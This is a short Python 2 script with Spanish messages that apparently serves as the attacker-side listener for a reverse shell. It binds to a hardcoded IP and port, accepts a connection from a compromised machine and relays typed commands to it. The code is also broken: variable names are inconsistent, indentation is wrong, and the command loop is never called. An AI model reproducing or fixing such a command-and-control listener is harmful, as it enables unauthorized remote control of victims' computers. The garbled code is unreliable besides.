#!/usr/bin/env python
#_*_ coding: utf8 _*_

import socket

def shell():
    current_dir = target.recv(1024)
    while True:
        comand = raw_input("{}~#: ".format(current_dir))
        if command == "exit":
            target.send(command)
            break
        elif comand[:2] == "cd":
            target.send(comand)
            res = target.recv(1024)
            current_dir = res
            print(res)
            elif comand == "":
                pass
        else:
            target.send(command)
            res = target.recv(1024)
            print(res)

def upserver():
    global server
    global ip
    global target
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('120.254.254.121', 7778))
server.listen(2)

print("corriendo servidor y esperando conexiones...")

target, ip = server.accept()
print("conexion recibida de: " + str(ip[0]))

upserver()
server.close()
